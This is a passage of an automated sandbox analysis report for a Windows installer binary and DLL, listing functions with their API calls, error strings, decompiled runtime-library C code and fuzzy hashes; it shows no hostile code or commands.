                                                                                                                                                                  • Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
                                                                                                                                                                  • Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00439252, Relevance: 7.6, APIs: 5, Instructions: 118registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 0043932A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00020019), ref: 00439365
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 00439381
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 0043938E
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 0043939B
                                                                                                                                                                    • Part of subcall function 004321E8: RegCloseKey.ADVAPI32(00000000), ref: 0043233A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: fbe6d85ac30a0dc54d85a6d165344f811891950168cf86b2a0354d556b1f643b
                                                                                                                                                                  • Instruction ID: b40024304262db2bdc02b3053b396216f17f0df8e61ece4bed7a662dd508e462
                                                                                                                                                                  • Opcode Fuzzy Hash: fbe6d85ac30a0dc54d85a6d165344f811891950168cf86b2a0354d556b1f643b
                                                                                                                                                                  • Instruction Fuzzy Hash: D4414DB2C0022DFFCF11AF94DD819AEFA79AF0C754F11527AEA01B6261C7B54E409B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00434004, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007000D,00000000,?,?,00000000,00000000,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 0043404A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00434056
                                                                                                                                                                    • Part of subcall function 00431231: GetProcessHeap.KERNEL32(00000000,0000005A,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431239
                                                                                                                                                                    • Part of subcall function 00431231: HeapSize.KERNEL32(00000000,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431240
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                  • Opcode ID: f8761297480b75186cd078af75affc56b98174bef9d8f624ea1d0bb67533dec0
                                                                                                                                                                  • Instruction ID: 1e3e032e7f16b004de5db61f72d2123e875419da1d3f6caca04779606935e5e0
                                                                                                                                                                  • Opcode Fuzzy Hash: f8761297480b75186cd078af75affc56b98174bef9d8f624ea1d0bb67533dec0
                                                                                                                                                                  • Instruction Fuzzy Hash: 92312732300615ABDB148E698C44AEB77E9EF88364F11522BFE11DB2A0E735EC4187D9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403AC6, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000F8,00000000,00000000,00000000,?,00402308,000000F8,000000F8,000002A8,00000000,00000001,000000F8), ref: 00403AD3
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000F8,000000F8,00000001,00000000,?,00402308,000000F8,000000F8,000002A8,00000000,00000001,000000F8), ref: 00403B74
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00403B63
                                                                                                                                                                  • Failed to get variable: %ls, xrefs: 00403B0D
                                                                                                                                                                  • Failed to format value '%ls' of variable: %ls, xrefs: 00403B3E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to format value '%ls' of variable: %ls$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-1273532094
                                                                                                                                                                  • Opcode ID: 3e05dae4056529436b85fd7dc5c19cf0bbe4f7640864a9c8f188c2b7a516e629
                                                                                                                                                                  • Instruction ID: e4550130b19b702e804d4c3dd7b3e9640169f4b7be7a9b76d97ada3842389fc7
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e05dae4056529436b85fd7dc5c19cf0bbe4f7640864a9c8f188c2b7a516e629
                                                                                                                                                                  • Instruction Fuzzy Hash: 84117F36900215FBCF111E55CC05F9A7E39FB0471AF104126F914751A1D379AB60ABD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042E5ED, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 0042E5F9
                                                                                                                                                                    • Part of subcall function 0042BBE1: __FF_MSGBANNER.LIBCMT ref: 0042BBF8
                                                                                                                                                                    • Part of subcall function 0042BBE1: __NMSG_WRITE.LIBCMT ref: 0042BBFF
                                                                                                                                                                    • Part of subcall function 0042BBE1: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,0042C16B,00000000,00000000,00000000,00000000,?,0042C05B,00000018,00454160), ref: 0042BC24
                                                                                                                                                                  • _free.LIBCMT ref: 0042E60C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2734353464-0
                                                                                                                                                                  • Opcode ID: 2b8b9a0b149064b7c10ffa9c32ed741fc56f4de5a02850290b0b915e6c568d63
                                                                                                                                                                  • Instruction ID: 6840f4d756b0eee8bd0161fd79570ac2f6643b718815756135da4e1fa473277d
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b8b9a0b149064b7c10ffa9c32ed741fc56f4de5a02850290b0b915e6c568d63
                                                                                                                                                                  • Instruction Fuzzy Hash: AF11C132714231ABCB212F76BC45B9A3B859B203A5BD0452BF9099E261DB3D885086DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019390, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAD0(_a4);
				_t18 = E1000CAD0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAD0(_a8);
						_t21 = E1000CAD0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                                                                                                                                  0x10019390
                                                                                                                                                                  0x10019390
                                                                                                                                                                  0x1001939b
                                                                                                                                                                  0x100193a9
                                                                                                                                                                  0x100193ae
                                                                                                                                                                  0x100193b3
                                                                                                                                                                  0x100193be
                                                                                                                                                                  0x100193c1
                                                                                                                                                                  0x100193dc
                                                                                                                                                                  0x100193e0
                                                                                                                                                                  0x100193f1
                                                                                                                                                                  0x100193f6
                                                                                                                                                                  0x100193fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019412
                                                                                                                                                                  0x10019417
                                                                                                                                                                  0x1001941c
                                                                                                                                                                  0x100193d0
                                                                                                                                                                  0x100193d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100193d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001941e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019427
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
                                                                                                                                                                  • Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019730, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019730(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAD0(_a4);
					_t21 = E1000CAD0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAD0(_a4);
							_t24 = E1000CAD0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E8FF(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAD0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}















                                                                                                                                                                  0x10019730
                                                                                                                                                                  0x10019730
                                                                                                                                                                  0x10019737
                                                                                                                                                                  0x10019742
                                                                                                                                                                  0x10019756
                                                                                                                                                                  0x10019764
                                                                                                                                                                  0x10019769
                                                                                                                                                                  0x1001976e
                                                                                                                                                                  0x10019770
                                                                                                                                                                  0x10019782
                                                                                                                                                                  0x10019786
                                                                                                                                                                  0x10019794
                                                                                                                                                                  0x10019799
                                                                                                                                                                  0x100197a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100197bb
                                                                                                                                                                  0x100197c0
                                                                                                                                                                  0x100197c5
                                                                                                                                                                  0x1001977f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100197c7
                                                                                                                                                                  0x100197c7
                                                                                                                                                                  0x100197c7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100197c5
                                                                                                                                                                  0x10019782
                                                                                                                                                                  0x1001976e
                                                                                                                                                                  0x100197d2
                                                                                                                                                                  0x100197d9

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
                                                                                                                                                                  • Instruction ID: 99576d049c222a76ac79d86fac94021c753d4d4845e8680ecbc727badbbf4d85
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
                                                                                                                                                                  • Instruction Fuzzy Hash: 8511A7B9D1420CABEB10CFA4D845B9E77E4EF042A8F008165FC0B9B641E635EA94C782
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042492E, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,00424926,00000000), ref: 00424949
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00424926,00000000), ref: 00424955
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,00424926,00000000), ref: 00424962
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00424926,00000000), ref: 0042496F
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,00000000,?,00424926,00000000), ref: 0042497E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                  • Opcode ID: dea536cc78a68ed4662c43d112e302ac2b18208931349bf8c240dcb4617dd70d
                                                                                                                                                                  • Instruction ID: ee18a24e31947c009ffcfd05c3693c858a87eff4a3d0d5afeafab75f541824e8
                                                                                                                                                                  • Opcode Fuzzy Hash: dea536cc78a68ed4662c43d112e302ac2b18208931349bf8c240dcb4617dd70d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01FB76500B25DFCB305F66E880817F7E9FF90715355893FD2A652A20C775A880CF84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000EAC5, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1000EAC5(void* __ebx, void* __edi) {

				E100115F6();
				if(E10014911(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10334590);
					__eax = E1001158A( *0x10335480);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}



                                                                                                                                                                  0x1000eac5
                                                                                                                                                                  0x1000eadc
                                                                                                                                                                  0x1000eae2
                                                                                                                                                                  0x1000eae3
                                                                                                                                                                  0x1000eaef
                                                                                                                                                                  0x1000eaf7
                                                                                                                                                                  0x1000eaf9
                                                                                                                                                                  0x1000eb12
                                                                                                                                                                  0x1000eb13
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000eafb
                                                                                                                                                                  0x1000eafb
                                                                                                                                                                  0x1000eafc
                                                                                                                                                                  0x1000eafd
                                                                                                                                                                  0x1000eb04
                                                                                                                                                                  0x1000eb0a
                                                                                                                                                                  0x1000eb0e
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eaf9
                                                                                                                                                                  0x1000eb31

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 1000EAC5
                                                                                                                                                                    • Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
                                                                                                                                                                    • Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
                                                                                                                                                                    • Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 1000EAD1
                                                                                                                                                                    • Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
                                                                                                                                                                    • Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 1000EAEF
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • __initptd.LIBCMT ref: 1000EAFD
                                                                                                                                                                    • Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103315D0,0000000C,1001176F,00000000,00000000), ref: 1001166E
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
                                                                                                                                                                    • Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
                                                                                                                                                                    • Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1000EB04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1662683381-0
                                                                                                                                                                  • Opcode ID: 97818940081b3572a8cd4e37b72976b450beb0fe731b3ad04c6e54edf7fa5606
                                                                                                                                                                  • Instruction ID: 106076030708d108cc7be60c426ae776d5d8c147d49c5448cdaefb0738cd9b5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 97818940081b3572a8cd4e37b72976b450beb0fe731b3ad04c6e54edf7fa5606
                                                                                                                                                                  • Instruction Fuzzy Hash: B5F02E37204252A9F328E7351C02C4F3784DF827F1721092DF157E80E1EE21D9815560
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043497C, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: #115#116
                                                                                                                                                                  • String ID: $wiutil.cpp
                                                                                                                                                                  • API String ID: 618785432-1260143216
                                                                                                                                                                  • Opcode ID: bcaf333c83d24b46a98b58266fa69bd6d7558c77c938222f1c74083833de1170
                                                                                                                                                                  • Instruction ID: 137b3a1266950ed53ae5a31a67f3388c14f14cca51fb3d621672cfc33db73114
                                                                                                                                                                  • Opcode Fuzzy Hash: bcaf333c83d24b46a98b58266fa69bd6d7558c77c938222f1c74083833de1170
                                                                                                                                                                  • Instruction Fuzzy Hash: DA61B371A402158FCF18DF59C8806EEF7A1BB8C324F14926FE806DF252D638E951CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041CBEA, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,0000001C,00000000,?,00000000,?,0041D735,000003BC,00000001,00401414,000000F8), ref: 0041CC53
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed grow array of ordered patches., xrefs: 0041CD62
                                                                                                                                                                  • Failed to copy target product code., xrefs: 0041CD14
                                                                                                                                                                  • Failed to plan action for target product., xrefs: 0041CC9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to plan action for target product.
                                                                                                                                                                  • API String ID: 1825529933-2271831357
                                                                                                                                                                  • Opcode ID: f1b97c0345679fe6e798a195640769af04ec6a95a7af33f545d269e03309130c
                                                                                                                                                                  • Instruction ID: 9c41103540cd5eed0fbd30f2f817f473fc60db772dafb5f705850f0caeb4d6d6
                                                                                                                                                                  • Opcode Fuzzy Hash: f1b97c0345679fe6e798a195640769af04ec6a95a7af33f545d269e03309130c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D7105B5240346AFCB04CF58CC80AAA77A5FF48324F12856AE9198B351D734ED51CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004369F6, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
